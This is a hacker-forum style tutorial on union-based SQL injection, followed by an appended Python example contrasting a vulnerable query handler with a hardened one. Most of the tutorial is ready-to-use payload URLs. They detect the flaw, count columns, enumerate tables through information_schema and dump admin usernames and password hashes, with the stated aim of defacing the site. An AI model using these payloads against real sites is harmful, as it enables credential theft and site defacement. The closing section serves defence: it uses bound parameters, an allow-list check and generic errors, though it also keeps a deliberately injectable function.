**SQL injection basic tutorial**
This tutorial is for educational purposes only.
Okay, let's start.
Example site: http://CoDeX.com/index.php?id=10
Note: that is only an example, based on my leetname.
Steps in this tutorial
Step 1. First you need to find out if the site is vulnerable
http://CoDeX.com/index.php?id=10
//To find out whether the URL is vulnerable, put a ' at the end.
http://CoDeX.com/index.php?id=10'
//If it gives an error, it is vulnerable.
Step 2. Finding columns.
http://CoDeX.com/index.php?id=10 order by 1--
//No error (nothing on the site changes)
Continue with 2--, 3--, 4--, ... until you see an error on the site. If 4-- is the one that gives an error, we go with 3--, the last one that did not give an error.
Step 3. Select columns
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT 1,2,3--
//Some numbers will show up there; those are the columns. Pick the number that is in bold. If none is in bold, try them all.
Step 4. Finding version, database, user.
//In this part I start with 1 if none of the columns is in bold. But if one is, put the code there: remove that number and put the code in its place.
For version
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT version(),2,3--
For Database
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT database(),2,3--
For user
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT user(),2,3--
Step 5. Finding Tables
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char()--
//Some tables will show up there; pick a table that we will use in the next step.
//The one I picked is ADMINS.
//Let's convert ADMINS into ASCII format
ADMINS = 65 68 77 73 78 83 in ASCII format
//Let's put the converted ASCII inside the CHAR.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char(65,68,77,73,78,83)--
//There, we have also got the columns in table ADMINS.
Step 6. Let's get the username and password.
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT concat(username,0x3a,password),2,3, from ADMINS--
If it is in MD5 format, just convert it.
It's ready for defacing now, but that's as far as it goes for now. Hihi
PS: I don't know if my tutorial is confusing. Please bear with it.
DONE!!!
Happy Sharing
~CoDeX
#AllHailPHU
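
Every step above depends on the `id` value being concatenated into the SQL text and on database errors being shown to the client. The following is an added example, not part of the original post, showing that pattern beside a hardened handler. It uses Python with an in-memory SQLite database in place of the PHP/MySQL site the post describes; the `articles` table, its sample row and all function names are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data standing in for the table behind index.php?id=."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (10, 'Hello', 'First post')")
    return db

def fetch_vulnerable(db, raw_id):
    # The id value is pasted into the SQL text, so everything after the number
    # is parsed as SQL. A stray quote becomes a syntax error (step 1) and a
    # UNION clause becomes part of the statement (step 3).
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def fetch_hardened(db, raw_id):
    # 1) Allow-list: the parameter must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    # 2) Bound parameter: the value travels separately from the SQL text and
    #    can never change the statement's structure.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def handle_request(db, raw_id):
    # Map every failure to the same generic response so that database error
    # text, which step 1 uses as its signal, never reaches the client.
    try:
        rows = fetch_hardened(db, raw_id)
    except (ValueError, sqlite3.Error):
        return 400, "Bad request"
    return (200, rows[0][1]) if rows else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    # Parameter values taken from the steps in the post.
    for value in ["10", "10'", "10 order by 1--", "-10 UNION ALL SELECT 1,2,3--"]:
        print(repr(value), "->", handle_request(db, value))
```

The same two controls apply on the PHP side: prepared statements with bound parameters, and error display turned off in production.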